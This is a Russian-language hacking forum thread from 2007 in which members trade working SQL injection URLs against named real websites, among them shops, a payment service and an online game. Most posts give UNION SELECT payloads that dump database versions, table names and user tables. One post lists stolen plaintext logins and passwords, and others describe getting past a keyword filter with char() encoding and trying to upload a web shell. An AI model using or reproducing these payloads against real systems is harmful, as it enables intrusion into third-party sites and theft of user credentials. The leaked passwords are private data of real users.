 |
|
17.11.2007, 02:56
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами:
10242288
Репутация:
536
|
|
Бага в юнекте (кто в танке - вот идешь ты пополнять баланс, а тут юнект...). Нашел Ув. Товарищ Dj_Bes и выложил в болталке за что очень несправедливо получил кучу брани в свой адрес. Инъекцию выкладывал не разработанную, я довел ее до ума, вот результаты:
5.0.40-log;unactpay@pechkin;unactpay_db
http://unactpay.ru/index.php?page=news&cur=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12, 13+from+INFORMATION_SCHEMA.tables+LIMIT+1,1/*
таблицы походу такие:
file
menu
news
offices
order_rent
page
partners
provider
terminal
terminal_category
terminal_type
filepriv не позволяет проводить операции с файлами =\.
|
|
|
17.11.2007, 03:06
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами:
10242288
Репутация:
536
|
|
З.Ы. Блин забыл - интересна табличка order_rent , я не вкурил кем она заполняеться но судя по названия (order - приказывать, но можно здесь перевести и как заказ) это табличка заказов. Это походу единственное что заслуживает внимания - http://unactpay.ru/index.php?page=news&cur=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,name,12,13+FRO M+order_rent/* например так.
Кодеры - явно барыги и добавили какую то кривую защиту. Т.е. для подбора имен полей пользоваться банальным WHERE+TABLE_NAME='vasya_pupkin' нельзя, нужно воспользоваться функцией char(), т.е. например WHERE+TABLE_NAME='vasya_pupkin' прерращаеться в WHERE+TABLE_NAME=char(118,97,115,121,97,95,112,117 ,112,107,105,110)
Последний раз редактировалось А®ТеS; 17.11.2007 в 03:33..
|
|
|
|
17.11.2007, 12:22
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
С нами:
10240623
Репутация:
79
|
|
Код HTML:
http://www.posibila.ro/index.php?ce=artisti&id=116+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
БД 4 |
|
|
|
17.11.2007, 16:01
|
|
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
С нами:
10366322
Репутация:
45
|
|
Код:
http://frozenfoods.ru/links.php?part_id=-27+union+select+login+from+users/*
Пользователи.
admin:yjvekg12
frozenfoods:irishka
buyer:enter
шелл залить не получаеться
/www/vhosts/frozenfoods.ru/html/func/admin.inc |
|
|
|
18.11.2007, 12:59
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
С нами:
9876886
Репутация:
18
|
|
Все скули ищутся вручную, или в частных случаях, самописными приватными программами, которые никто никогда не даст.
PS:
http://www.sosna.ru/?nid=-41+union+select+1,2,3,user(),version(),6/*
БД5. Если кто шелл зальет стукните в аську |
|
|
|
18.11.2007, 22:37
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
http://www.fwdshop.ru/ - молодежная одежда, оптовая торговля
Код:
http://www.fwdshop.ru/index.php?gallery=-1+union+SELECT+1,concat_ws(char(58,58),user_id,user_email,password,password2)+FROM+fwd_users/*
Через limit перебираем пользователей. Позабавило то, что в поле password2 лежит зашифрованый пароль, а в password - в открытом виде, всегда бы так 
|
|
|
|
18.11.2007, 23:02
|
|
Познающий
Регистрация: 13.01.2007
Сообщений: 96
С нами:
10171592
Репутация:
50
|
|
Разбираем 
Код:
http://www.football-equipment-uk.com/links.php?link_id=-99%20union%20select%201,2,3,4,5,6,7,8,9/*
Код:
http://www.vernunft-schweiz.ch/links.php?link_id=-999+union+select+1,2,3,4,5,6/*
Код:
http://danilka.com/links.php?link_id=-999+union+select+1,2,3,4,5,6,7,8,9/*
Код:
http://www.litriocht.com/shop/links.php?link_id=-999+union+select+1,2,version(),user(),5,6,7,8,9/*
Код:
http://www.dsp-es.com/vshop/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
Код:
http://www.lickscycles.com/catalog/links.php?link_id=-999+union+select+version(),2,database(),user(),5,6,7,8,9,10/*
Код:
http://www.eoilcandles.com/catalog/links.php?link_id=-999+union+select+version(),2,database(),user(),5,6,7,8,9,10/*
Последний раз редактировалось Tyc00n; 18.11.2007 в 23:10..
|
|
|
|
19.11.2007, 01:05
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
http://www.thecorporatelibrary.com/
Код:
http://www.thecorporatelibrary.com/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58),user_id,username,pword),10,11,12,13,14,15,16,17,18+from+users/*
Перебираем лимитом...
http://www.btleague.net/
Что-то напоминающее примитивную онлайн игру, но я так и не разобрался, не силен я в итальянском....
Код:
http://www.btleague.net/info.asp?id=1+or+1=(SELECT+TOP+1+usuario+FROM+USUARIO)--
Код:
http://www.btleague.net/info.asp?id=1+or+1=(SELECT+TOP+1+passw+FROM+USUARIO)--
Все колонки таблицы USUARIO: 'id_usuario','passw','fecha_registro','ultimo_logi n','email','usuario','imagen','bot','region','pais ','zona','ip_registro','activo','GM'
Таблицы:
'HISTORIAL_ECONOMICO','TIPO_CRIATURA','TIPO_GUARID A','GUARIDA','POBLADO','CAMPAMENTO','TIPO_INFRAEST RUCTURA','kill_kk','INFRAESTRUCTURAS','OBRAS','HAB ITANTES','ESTADISTICA_USUARIO','EJERCITOS','LEADER ','EJERCITO','CORREO','RETO','BATALLA','COMENTARIO S','SUCESOS','REQUISITOS','NOTICIAS','TROFEO','PRI SIONEROS_IP','TIPO_OFICIO','TRABAJADORES','FABRICA ','CONTROL','PAQUETES','PAQUETE','LIGAS','PARTIDOS ','CLASIFICACION','BTLEAGUE','GRUPOS','ACTA','USUA RIO','PROPIEDADES_USUARIO','VASALLOS'
Последний раз редактировалось Ded MustD!e; 19.11.2007 в 02:35..
|
|
|
|
19.11.2007, 05:46
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 17
С нами:
9763510
Репутация:
46
|
|
http://www.folgreb.ru/news/article.php?id=-21+union+select+1,concat_ws(0x3a,version(),%20%20d atabase(),user()),3,4,5,6,7,8,9,10,11,12,13/*
5.0.45:folgrebru_site:folgrebru@81.177.16.61
|
|
|
|
19.11.2007, 11:00
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами:
10194175
Репутация:
524
|
|
intercer.net
Код:
http://www.intercer.net/newstext.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
4.1.22-standard:intercer_su:intercer_su@localhost
Последний раз редактировалось fRg; 19.11.2007 в 15:38..
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
|
|
|
|
Линейный вид
